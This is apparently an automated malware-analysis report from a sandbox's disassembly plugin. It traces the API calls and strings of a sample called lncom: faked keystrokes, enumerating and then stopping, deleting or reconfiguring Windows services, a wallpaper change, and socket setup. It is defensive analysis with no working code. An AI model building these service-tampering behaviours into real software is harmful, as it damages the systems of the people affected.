Sleep.KERNEL32(00000032,00000090,00000000,00000002,00000000,00000090,00000000,00000000,00000000,00000064,00000090,00000000,00000002,00000000), ref: 0042A57D
keybd_event.USER32(00000014,00000000,00000000,00000000), ref: 0042A58A
keybd_event.USER32(00000014,00000000,00000002,00000000), ref: 0042A597
Sleep.KERNEL32(00000064,00000014,00000000,00000002,00000000,00000014,00000000,00000000,00000000,00000032,00000090,00000000,00000002,00000000,00000090,00000000), ref: 0042A59E
keybd_event.USER32(00000014,00000000,00000000,00000000), ref: 0042A5AB
keybd_event.USER32(00000014,00000000,00000002,00000000), ref: 0042A5B8
Sleep.KERNEL32(00000032,00000014,00000000,00000002,00000000,00000014,00000000,00000000,00000000,00000064,00000014,00000000,00000002,00000000,00000014,00000000), ref: 0042A5BF
keybd_event.USER32(00000091,00000000,00000000,00000000), ref: 0042A5CF
keybd_event.USER32(00000091,00000000,00000002,00000000), ref: 0042A5DF
Sleep.KERNEL32(00000064,00000091,00000000,00000002,00000000,00000091,00000000,00000000,00000000,00000032,00000014,00000000,00000002,00000000,00000014,00000000), ref: 0042A5E6
keybd_event.USER32(00000091,00000000,00000000,00000000), ref: 0042A5F6
keybd_event.USER32(00000091,00000000,00000002,00000000), ref: 0042A606
Sleep.KERNEL32(00000032,00000091,00000000,00000002,00000000,00000091,00000000,00000000,00000000,00000064,00000091,00000000,00000002,00000000,00000091,00000000), ref: 0042A60D

Memory Dump Source

Source File: 00000004.00000002.360154088.0000000000401000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.360143217.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000004C1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000004CA000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005BF000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005E1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005E4000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005FA000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360408721.00000000005FD000.00000004.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_lncom.jbxd

Similarity

API ID: keybd_event$Sleep
String ID:
API String ID: 1412104608-0
Opcode ID: bb9573bfec40661dd557a1242a693f115f2f19e04c9c643e0c934e59fcbb335e
Instruction ID: 9371f0b61b689e3aeb3cf5f10804ac0ade5588cf2697131f6afe3767637b2f51
Opcode Fuzzy Hash: bb9573bfec40661dd557a1242a693f115f2f19e04c9c643e0c934e59fcbb335e
Instruction Fuzzy Hash: F52106747C972938F5343BA24E07F9859592F22F19F72802A73813C0D759E9396650BE

Uniqueness

Uniqueness Score: -1.00%

Function 00494BD0 Relevance: 24.6, APIs: 11, Strings: 3, Instructions: 127stringlibraryfileCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(kernel32.dll,?,?,?,?,00494E05,00000000,00000000,?,?,00000000,00494E44,?,80000001,Software\Borland\Locales,00000000), ref: 00494BEA
GetProcAddress.KERNEL32(00000000,GetLongPathNameA), ref: 00494BFB
lstrcpy.KERNEL32(?,00401173), ref: 00494C2B
lstrcpyn.KERNEL32(00401173,?,?,kernel32.dll,?,?,?,?,00494E05,00000000,00000000,?,?,00000000,00494E44), ref: 00494C8F
lstrcpyn.KERNEL32(00401173,?,00000001,00401173,?,?,kernel32.dll,?,?,?,?,00494E05,00000000,00000000,?,?), ref: 00494CC4
FindFirstFileA.KERNEL32(00401173,?,00401173,?,00000001,00401173,?,?,kernel32.dll,?,?,?,?,00494E05,00000000,00000000), ref: 00494CD7
FindClose.KERNEL32(00000000,00401173,?,00401173,?,00000001,00401173,?,?,kernel32.dll,?,?,?,?,00494E05,00000000), ref: 00494CE4
lstrlen.KERNEL32(?,00000000,00401173,?,00401173,?,00000001,00401173,?,?,kernel32.dll,?,?,?,?,00494E05), ref: 00494CF0
lstrcpy.KERNEL32(0000005D,?), ref: 00494D1B
lstrlen.KERNEL32(?,?,00000000,00401173,?,00401173,?,00000001,00401173,?,?,kernel32.dll), ref: 00494D27
lstrcpy.KERNEL32(?,0000005C), ref: 00494D45

Strings

GetLongPathNameA, xrefs: 00494BF5
\, xrefs: 00494D02
kernel32.dll, xrefs: 00494BE5

Memory Dump Source

Source File: 00000004.00000002.360154088.0000000000401000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.360143217.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000004C1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000004CA000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005BF000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005E1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005E4000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005FA000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360408721.00000000005FD000.00000004.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_lncom.jbxd

Similarity

API ID: lstrcpy$Findlstrcpynlstrlen$AddressCloseFileFirstHandleModuleProc
String ID: GetLongPathNameA$\$kernel32.dll
API String ID: 1266275573-1565342463
Opcode ID: 00a6cb7fd53941ec8593b19601707bf7fad8a6311a43bb3861e951870d65ec52
Instruction ID: 760f1254f88ea623b6dee8334d48ef16fccec71e8fa2e667aff2f7436fab861b
Opcode Fuzzy Hash: 00a6cb7fd53941ec8593b19601707bf7fad8a6311a43bb3861e951870d65ec52
Instruction Fuzzy Hash: 4F415171A00218AFDF10DBA5CC89FDE7BEC9F88304F1405BBA509D7241D6789E468B28

Uniqueness

Uniqueness Score: -1.00%

Function 0046ACDC Relevance: 23.2, APIs: 12, Strings: 1, Instructions: 413COMMON

Download Yara Rule

Strings

XOF, xrefs: 0046AEC0

Memory Dump Source

Source File: 00000004.00000002.360154088.0000000000401000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.360143217.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000004C1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000004CA000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005BF000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005E1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005E4000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005FA000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360408721.00000000005FD000.00000004.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_lncom.jbxd

Similarity

API ID: LoadString
String ID: XOF
API String ID: 2948472770-1974473077
Opcode ID: f87a75013cb0cd66654f958ff6c1076c6647edacb6d84279679027c9e0b44018
Instruction ID: 479cac18657a942b333a4a247df86464682666ac5280497f2f85166b0e7eae41
Opcode Fuzzy Hash: f87a75013cb0cd66654f958ff6c1076c6647edacb6d84279679027c9e0b44018
Instruction Fuzzy Hash: 13F1AD71A00604EFDB50DBA9C995F9E77F4EF04304F5501A6E904EB362E778AE40DB8A

Uniqueness

Uniqueness Score: -1.00%

Function 0040871C Relevance: 18.1, APIs: 12, Instructions: 146serviceCOMMON

Download Yara Rule

APIs

OpenSCManagerA.ADVAPI32(00000000,00000000,400F003F,?,004085D7,?,00000002), ref: 00408733
EnumServicesStatusA.ADVAPI32(?,00000030,00000003,00000000,00000000,?,?,?), ref: 00408752
EnumServicesStatusA.ADVAPI32(?,00000030,00000003,?,?,?,?,?), ref: 0040877C
CharLowerA.USER32(?,?), ref: 004087FF
OpenServiceA.ADVAPI32(?,?,00000001), ref: 00408826
QueryServiceConfigA.ADVAPI32(?,00000000,00000000,?,?,?,00000001), ref: 00408839
QueryServiceConfigA.ADVAPI32(?,?,?,?,?,00000000,00000000,?,?,?,00000001), ref: 00408857
CloseServiceHandle.ADVAPI32(?,?,?,?,?,?,00000000,00000000,?,?,?,00000001), ref: 0040885F
OpenServiceA.ADVAPI32(?,?,00000002,?,?,?,?,?,?,00000000,00000000,?,?,?,00000001), ref: 00408875
ChangeServiceConfigA.ADVAPI32(?,?,?,?,?,?,00000000,?,?,00000000,?,?,?,00000002,?,?), ref: 004088B0
CloseServiceHandle.ADVAPI32(?,?,?,?,?,?,?,00000000,?,?,00000000,?,?,?,00000002,?), ref: 004088B8
CloseServiceHandle.ADVAPI32(?,?,00000030,00000003,?,?,?,?,?,?,00000030,00000003,00000000,00000000,?,?), ref: 004088CF

Memory Dump Source

Source File: 00000004.00000002.360154088.0000000000401000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.360143217.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000004C1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000004CA000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005BF000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005E1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005E4000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005FA000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360408721.00000000005FD000.00000004.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_lncom.jbxd

Similarity

API ID: Service$CloseConfigHandleOpen$EnumQueryServicesStatus$ChangeCharLowerManager
String ID:
API String ID: 2890475651-0
Opcode ID: 240ece034491741a59caf451970f86be09aeca6e2ca7dd670241e5c5e6302b18
Instruction ID: 8b1ae92f50c08a988ced39661bdd3c9fe6dfeb51bffca6ee5920315339f90a13
Opcode Fuzzy Hash: 240ece034491741a59caf451970f86be09aeca6e2ca7dd670241e5c5e6302b18
Instruction Fuzzy Hash: 27510571D00109ABDF06EFD4CD42EEEBB7ABF08304F2081AAF614761A1DB365A51DB54

Uniqueness

Uniqueness Score: -1.00%

Function 004088E4 Relevance: 16.6, APIs: 11, Instructions: 118serviceCOMMON

Download Yara Rule

APIs

OpenSCManagerA.ADVAPI32(00000000,00000000,000F003F), ref: 004088FB
EnumServicesStatusA.ADVAPI32(?,00000030,00000003,00000000,00000000,?,?,?), ref: 0040891A
EnumServicesStatusA.ADVAPI32(?,00000030,00000003,?,?,?,?,?), ref: 00408944
CharLowerA.USER32(?,?), ref: 004089C7
OpenServiceA.ADVAPI32(?,?,00000020), ref: 004089EA
ControlService.ADVAPI32(?,00000001,?,?,?,00000020), ref: 004089FB
CloseServiceHandle.ADVAPI32(?,?,00000001,?,?,?,00000020), ref: 00408A03
OpenServiceA.ADVAPI32(?,?,00010000,?,?,00000001,?,?,?,00000020), ref: 00408A1C
DeleteService.ADVAPI32(?,?,?,00010000,?,?,00000001,?,?,?,00000020), ref: 00408A27
CloseServiceHandle.ADVAPI32(?,?,?,?,00010000,?,?,00000001,?,?,?,00000020), ref: 00408A2F
CloseServiceHandle.ADVAPI32(?,?,00000030,00000003,?,?,?,?,?,?,00000030,00000003,00000000,00000000,?,?), ref: 00408A46

Memory Dump Source

Source File: 00000004.00000002.360154088.0000000000401000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.360143217.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000004C1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000004CA000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005BF000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005E1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005E4000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005FA000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360408721.00000000005FD000.00000004.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_lncom.jbxd

Similarity

API ID: Service$CloseHandleOpen$EnumServicesStatus$CharControlDeleteLowerManager
String ID:
API String ID: 881754166-0
Opcode ID: e4735d0e369f0e72449ece028fb855bf172caed7880a729b78ce1b56bc400a88
Instruction ID: 361f40e7aa621872ed0cca35583ec4da7afaa38633e601193f702117c199a02a
Opcode Fuzzy Hash: e4735d0e369f0e72449ece028fb855bf172caed7880a729b78ce1b56bc400a88
Instruction Fuzzy Hash: FB413971D00109ABCF16EFD1CD42AFEBBBAAF04304F1040AAE504761A1EB361B51CB68

Uniqueness

Uniqueness Score: -1.00%

Function 00402184 Relevance: 16.0, APIs: 5, Strings: 4, Instructions: 252memorylibraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(iphlpapi.dll), ref: 004021BE
LoadLibraryA.KERNEL32(iphlpapi.dll,iphlpapi.dll), ref: 004021D7
GetProcAddress.KERNEL32(000000FF,GetNetworkParams), ref: 00402256
GetProcessHeap.KERNEL32(00000000,00004000,000000FF,GetNetworkParams,iphlpapi.dll,iphlpapi.dll), ref: 004022D3
RtlAllocateHeap.NTDLL(00000000,00000000,00004000), ref: 004022D9

Strings

iphlpapi.dll, xrefs: 004021B9, 004021D2
GetNetworkParams, xrefs: 0040224E
192.168.0.1, xrefs: 004021A3
t, xrefs: 00402386

Memory Dump Source

Source File: 00000004.00000002.360154088.0000000000401000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.360143217.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000004C1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000004CA000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005BF000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005E1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005E4000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005FA000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360408721.00000000005FD000.00000004.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_lncom.jbxd

Similarity

API ID: Heap$AddressAllocateHandleLibraryLoadModuleProcProcess
String ID: 192.168.0.1$GetNetworkParams$iphlpapi.dll$t
API String ID: 818692-3240464789
Opcode ID: 57f9bcdb0a17d573f92f42b4c402667bcc28808f84318b4e92a96db8897fbd42
Instruction ID: b3d18fa11436cd57fa04c4c0413984e611a1e00ad31f924c9423e65f9d0c8bed
Opcode Fuzzy Hash: 57f9bcdb0a17d573f92f42b4c402667bcc28808f84318b4e92a96db8897fbd42
Instruction Fuzzy Hash: 06A1F934D0020DDACF00EFD5D585ADDBBB8FF95318F20812AE814BB2A6D7B85946CB59

Uniqueness

Uniqueness Score: -1.00%

Function 0049B6C0 Relevance: 16.0, APIs: 7, Strings: 2, Instructions: 220COMMON

Download Yara Rule

APIs

GetLocaleInfoA.KERNEL32(00000000,00001001,?,00000040,005D7334,?,00000000), ref: 0049B722
GetLocaleInfoA.KERNEL32(00000000,00000003,?,00000004,00000000,00001001,?,00000040,005D7334,?,00000000), ref: 0049B733
SetLastError.KERNEL32(20000101,?,?,?,00000000), ref: 0049B7B1
GetSystemDefaultLangID.KERNEL32(005D7334,?,00000000), ref: 0049B7CA
GetLocaleInfoA.KERNEL32(?,00001002,?,00000040,?,?,?,00000000), ref: 0049B83B
SetLastError.KERNEL32(20000101,?,?,?,00000000), ref: 0049B8A1
GetLocaleInfoA.KERNEL32(?,0000000B,?,00000007,?,?,?,00000000), ref: 0049B8E4

Strings

000, xrefs: 0049B6F2
none, xrefs: 0049B6E4

Memory Dump Source

Source File: 00000004.00000002.360154088.0000000000401000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.360143217.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000004C1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000004CA000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005BF000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005E1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005E4000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005FA000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360408721.00000000005FD000.00000004.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_lncom.jbxd

Similarity

API ID: InfoLocale$ErrorLast$DefaultLangSystem
String ID: 000$none
API String ID: 3499229572-644053244
Opcode ID: b25958d7e4323458633632bdbfb32fa5757be6f280abba0c3687fc8e5bcb4def
Instruction ID: fca32897fabf38e2a46edd7343628df11242882d96de5db93779cb2c4f8156bf
Opcode Fuzzy Hash: b25958d7e4323458633632bdbfb32fa5757be6f280abba0c3687fc8e5bcb4def
Instruction Fuzzy Hash: B4710771D002099AEF10DAA1D941BFF7BB8EF88314F10417BE9456B281E77D9A41C7E9

Uniqueness

Uniqueness Score: -1.00%

Function 004349B4 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 83COMMON

Download Yara Rule

APIs

@Wsocket@WSocket_htons$qqrus.LNCOM(00000000,00434AD4), ref: 004349F7

Part of subcall function 004320B4: @Wsocket@WSocketGetProc$qqrx17System@AnsiString.LNCOM ref: 004320CA

@Wsocket@WSocketResolveHost$qqr17System@AnsiString.LNCOM(00000000,00434AD4), ref: 00434A09

Part of subcall function 00433EA8: @Wsocket@WSocketIsDottedIP$qqrx17System@AnsiString.LNCOM(' Invalid Hostname.,?,WSocketResolveHost: ',00000000,00434050), ref: 00433F4F
Part of subcall function 00433EA8: @Wsocket@WSocket_inet_addr$qqrpc.LNCOM(' Invalid Hostname.,?,WSocketResolveHost: ',00000000,00434050), ref: 00433F5E

@Wsocket@WSocket_bind$qqrir11sockaddr_ini.LNCOM(00000000,00434AD4), ref: 00434A20

Part of subcall function 00432294: @Wsocket@WSocketGetProc$qqrx17System@AnsiString.LNCOM ref: 004322B1

@Wsocket@WSocket_WSAGetLastError$qqrv.LNCOM(00000000,00000000,00434AD4), ref: 00434A2B

Part of subcall function 00431938: @Wsocket@WSocketGetProc$qqrx17System@AnsiString.LNCOM ref: 0043194A

@Wsocket@WSocket_getsockname$qqrir11sockaddr_inri.LNCOM(00000000,00434AD4), ref: 00434A5F
@Wsocket@WSocket_WSAGetLastError$qqrv.LNCOM(00000000,00000000,00434AD4), ref: 00434A6A

Strings

winsock.getsockname failed, error #%d, xrefs: 00434A79
winsock.bind failed, error #%d, xrefs: 00434A3A

Memory Dump Source

Source File: 00000004.00000002.360154088.0000000000401000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.360143217.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000004C1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000004CA000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005BF000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005E1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005E4000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005FA000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360408721.00000000005FD000.00000004.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_lncom.jbxd

Similarity

API ID: Wsocket@$AnsiSocketStringSystem@$Proc$qqrx17$Error$qqrvLastSocket_$DottedHost$qqr17P$qqrx17ResolveSocket_bind$qqrir11sockaddr_iniSocket_getsockname$qqrir11sockaddr_inriSocket_htons$qqrusSocket_inet_addr$qqrpc
String ID: winsock.bind failed, error #%d$winsock.getsockname failed, error #%d
API String ID: 476951839-1829457108
Opcode ID: ff55351f762cb916dc2f2f963422ef36460af5effdbd65add793c872aa483fa9
Instruction ID: 8a70398ab285d3e3435d90903106ea0708b5b8ded1572e1e429d4e361ea69161
Opcode Fuzzy Hash: ff55351f762cb916dc2f2f963422ef36460af5effdbd65add793c872aa483fa9
Instruction Fuzzy Hash: 7D310674A10208DBCB04EFA5D981ADDBBF5EF4C304F5050AAE804A7352DB74AE04DB59

Uniqueness

Uniqueness Score: -1.00%

Function 004080A0 Relevance: 12.5, APIs: 4, Strings: 3, Instructions: 255serviceCOMMON

Download Yara Rule

APIs

OpenSCManagerA.ADVAPI32(00000000,00000000,000F003F), ref: 00408110
EnumServicesStatusA.ADVAPI32(?,00000030,?,00000000,00000000,?,?,?), ref: 00408130
EnumServicesStatusA.ADVAPI32(?,00000030,?,?,?,?,?,?), ref: 0040815B
CloseServiceHandle.ADVAPI32(?,?,00000030,?,?,?,?,?,?,00000000,00000000,000F003F), ref: 00408340

Strings

, xrefs: 004083F3
Stopped, xrefs: 004081BA
Started, xrefs: 00408187

Memory Dump Source

Source File: 00000004.00000002.360154088.0000000000401000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.360143217.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000004C1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000004CA000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005BF000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005E1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005E4000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005FA000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360408721.00000000005FD000.00000004.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_lncom.jbxd

Similarity

API ID: EnumServicesStatus$CloseHandleManagerOpenService
String ID: $Started$Stopped
API String ID: 4215979710-2726340183
Opcode ID: 9c7326ef922900601dcda8dcd941bf1916676d0dbfa2653ec57aeaef30dd6950
Instruction ID: f413243cb3c706131b1f6bf9eb8a6703889fee27da7215232e13e957ce508680
Opcode Fuzzy Hash: 9c7326ef922900601dcda8dcd941bf1916676d0dbfa2653ec57aeaef30dd6950
Instruction Fuzzy Hash: 74B1F83491010D9BCF10EFD1D985ADDBBB9FF85309F20806AE40177266DB799A4ACB54

Uniqueness

Uniqueness Score: -1.00%

Function 0040E25C Relevance: 12.5, APIs: 2, Strings: 5, Instructions: 242COMMON

Download Yara Rule

APIs

SystemParametersInfoA.USER32(00000014,00000000,00000000,00000001), ref: 0040E3C4

Strings

.bmp, xrefs: 0040E39C
.jpeg, xrefs: 0040E2FD
.bmp, xrefs: 0040E4A7
.jpg, xrefs: 0040E2C7
8, xrefs: 0040E488

Memory Dump Source

Source File: 00000004.00000002.360154088.0000000000401000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.360143217.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000004C1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000004CA000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005BF000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005E1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005E4000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005FA000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360408721.00000000005FD000.00000004.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_lncom.jbxd

Similarity

API ID: InfoParametersSystem
String ID: .bmp$.bmp$.jpeg$.jpg$8
API String ID: 3098949447-2115098025
Opcode ID: 21b84f7a21486848d2d3b9ff996ae22b8ced4795720896810b5654a683c44647
Instruction ID: fe4f084df103ebce65e98bfb7d9e1b4a0222500c2ed8355b982a822f5ca206b8
Opcode Fuzzy Hash: 21b84f7a21486848d2d3b9ff996ae22b8ced4795720896810b5654a683c44647
Instruction Fuzzy Hash: F191303490010E9BDF00EFE5D4467DDB7B9FF99308F20C52BE810B6252D7B89A469B69

Uniqueness

Uniqueness Score: -1.00%

Function 00432678 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 84windowCOMMON

Download Yara Rule

APIs

@Wsocket@TCustomWSocket@WMASyncSelect$qqrr17Messages@TMessage.LNCOM(00000000,00432766), ref: 004326A6

Part of subcall function 00433594: @Wsocket@TCustomWSocket@ChangeState$qqr20Wsocket@TSocketState.LNCOM ref: 004335E0
Part of subcall function 00433594: @Wsocket@TCustomWSocket@ASyncReceive$qqrus.LNCOM ref: 00433635
Part of subcall function 00433594: @Wsocket@TCustomWSocket@TryToSend$qqrv.LNCOM ref: 00433653
Part of subcall function 00433594: @Wsocket@TCustomWSocket@ASyncReceive$qqrus.LNCOM ref: 004336BF

@Wsocket@TCustomWSocket@WMAsyncGetHostByName$qqrr17Messages@TMessage.LNCOM(00000000,00432766), ref: 004326C1

Strings

Test exception in WSocket, xrefs: 0043271E

Memory Dump Source

Source File: 00000004.00000002.360154088.0000000000401000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.360143217.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000004C1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000004CA000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005BF000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005E1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005E4000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005FA000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360408721.00000000005FD000.00000004.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_lncom.jbxd

Similarity

API ID: Wsocket@$CustomSocket@$Sync$MessageMessages@Receive$qqrus$AsyncChangeHostName$qqrr17Select$qqrr17Send$qqrvSocketStateState$qqr20
String ID: Test exception in WSocket
API String ID: 487860863-1679597001
Opcode ID: 13dcbb021e6ea935e73be37df2887c9d71d84426b2811c57e3b25da060a63289
Instruction ID: e966cacbd46a169f18d0d1dea0d0f3745fdc90325d5d634b27c66d770a15de43
Opcode Fuzzy Hash: 13dcbb021e6ea935e73be37df2887c9d71d84426b2811c57e3b25da060a63289
Instruction Fuzzy Hash: 4B31FB74A04208EFCB10DF99CA8199EBBB5FF4D325F2151A6E504A7310C778AE82DF59

Uniqueness

Uniqueness Score: -1.00%

Function 004085C4 Relevance: 12.1, APIs: 8, Instructions: 110serviceCOMMON

Download Yara Rule

APIs

Part of subcall function 0040871C: OpenSCManagerA.ADVAPI32(00000000,00000000,400F003F,?,004085D7,?,00000002), ref: 00408733
Part of subcall function 0040871C: EnumServicesStatusA.ADVAPI32(?,00000030,00000003,00000000,00000000,?,?,?), ref: 00408752
Part of subcall function 0040871C: EnumServicesStatusA.ADVAPI32(?,00000030,00000003,?,?,?,?,?), ref: 0040877C
Part of subcall function 0040871C: CharLowerA.USER32(?,?), ref: 004087FF
Part of subcall function 0040871C: OpenServiceA.ADVAPI32(?,?,00000001), ref: 00408826
Part of subcall function 0040871C: QueryServiceConfigA.ADVAPI32(?,00000000,00000000,?,?,?,00000001), ref: 00408839

